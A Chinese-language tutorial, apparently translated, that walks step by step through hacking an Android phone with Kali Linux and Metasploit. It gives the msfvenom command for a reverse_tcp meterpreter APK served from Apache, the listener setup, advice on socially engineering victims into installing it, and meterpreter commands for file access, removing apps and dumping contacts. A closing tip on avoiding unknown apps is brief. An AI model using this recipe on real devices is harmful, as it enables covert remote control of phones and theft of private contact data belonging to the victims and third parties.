欢迎回来!
如果您还没有读过前面的部分,在这里看到:
本集将分享一个很简单的教程,关于如何使用操作系统 Kali Linux 2.0 和 Metasploit(当您完成安装后已经存在于Kali Linux上),以入侵目标设备。
不要错过 《安装 Kali Linux 之后要做的10件事》
本演示将使用 msfvenom 创建有效载荷并将其另存为 apk 文件。生成有效载荷后,需要为 Metasploit 框架设置一个侦听器。
一旦目标下载并安装了恶意 apk,攻击者就可以轻松地在 Metasploit 上获得一个 meterpreter 会话。
攻击者需要进行一些社交工程,才能在受害者的移动设备上安装该apk。所以您应该先对目标进行研究:关于对方最有可能上哪种当(TA喜欢什么、最想要什么、对什么东西最急切 …… )就从哪里下手。
关于 Metasploit 《社交工程工具用于开源情报调查:0基础初学者指南》
按步骤演示教程
步骤1:使用 msfvenom 生成有效载荷
首先启动 Kali Linux,以便生成一个 apk 文件作为有效载荷。需要检查本地 IP,本案例中显示为 “192.168.0.112”。您也可以通过互联网入侵 Android 设备,使用LHOST中的公共/外部IP和端口转发。
获得本地主机 IP 后请使用 msfvenom 工具,它将生成一个有效载荷,渗透 Android 设备。输入命令如下:
# msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R> /var/www/html/ehacking.apk
-p 表示有效载荷类型
android/metepreter/reverse_tcp 是在指定一个来自目标安卓设备的反向 meterpreter shell
LHOST 是您的本地 IP
LPORT 被设置为侦听端口
R> /var/www/html 将在 apache 服务器上直接给出输出
apk 是输出的最终名称
生成将近一万字节的 apk 文件需要花点时间。
步骤2:发动攻击
在发起攻击之前,需要检查一下 apache 服务器的状态。输入命令:
# service apache2 status
看起来准备好了,现在启动 msfconsole。使用多重/处理程序漏洞利用,将有效载荷设置为与预先生成的相同,设置LHOST和LPORT值与有效载荷中使用的相同,最后键入漏洞利用以发起攻击。
在现实中,可以使用一些社交工程操纵手段,以诱使目标用户下载恶意apk文件。本演示中只是直接访问目标人的设备以在该设备中下载文件(恶意女仆方式)。
成功下载后,选择要安装的应用程序。
到目前为止,当尝试安装某些第三方应用程序时,经常会看到此选项,然而,通常用户会毫不犹豫地允许来自未知来源的安装。
启用设置以从第三方来源安装应用程序。最后点击底部的安装选项。
一旦用户安装了该应用程序并开始运行,就会立即在攻击方打开 meterepreter 会话。
步骤3:后开发
键入“background”,然后键入“sessions” 可以看到列出了连接到机器的所有IP 的所有会话。
您可以通过输入 sessions -i [session ID] 与任何会话进行交互。
进入会话后,键入“help” 以列出我们可以在此会话中提出的所有命令。
您会看到一些文件系统命令,这些命令在尝试获取一些敏感信息或数据时会非常有用。通过使用这些命令您可以轻松下载或上传任何文件或信息。
您还将找到一些网络命令,包括 portfwd 和 route:
一些强大的系统命令可获取用户ID、获取Shell、或获取完整的系统信息。
输入“app_list”,它将显示目标设备上所有已安装的应用程序:
您还可以从目标 Android 设备上卸载任何应用:
步骤4:从目标 Android 设备提取联系人
现在通过键入 “转储” 和双标签,从目标设备中提取一些联系人:
它将显示从目标设备提取的所有选项。输入“dump_contacts” 然后回车:
它将从目标 Android 设备中提取所有联系人,并将其保存在攻击者的本地目录中。
要查看此文件,请键入 “ls” 和 “cat [file_name]”
这将显示先前从目标设备下载的联系人文件的内容。
此信息确实很敏感,很容易被利用。再次强调,您的重要联系人切勿保存在手机通讯录里面,并不是必需等到被入侵它才是危险的,要求甚至秘密读取通讯录权限的应用非常多,它们每一个都会出卖您 —— 连锅端的重大隐患。
更多解释见 《“如果你不偏执,那就是疯了”》
meterpreter 中提供了许多其他命令。您可以进一步尝试探索和学习可以在目标 Android 设备上执行的操作。
现在得出的结论是,我们已经使用 Kali Linux 和 Metasploit-Framework 成功渗透了Android设备。
保护您的 Android 设备安全的一个重要提示是,即使您确实要安装,也不要从未知来源安装任何应用程序,请尝试阅读并检查其源代码,以了解此文件是否恶意。
⚪️
How To Hack Android Smartphone Using Kali Linux and Metasploit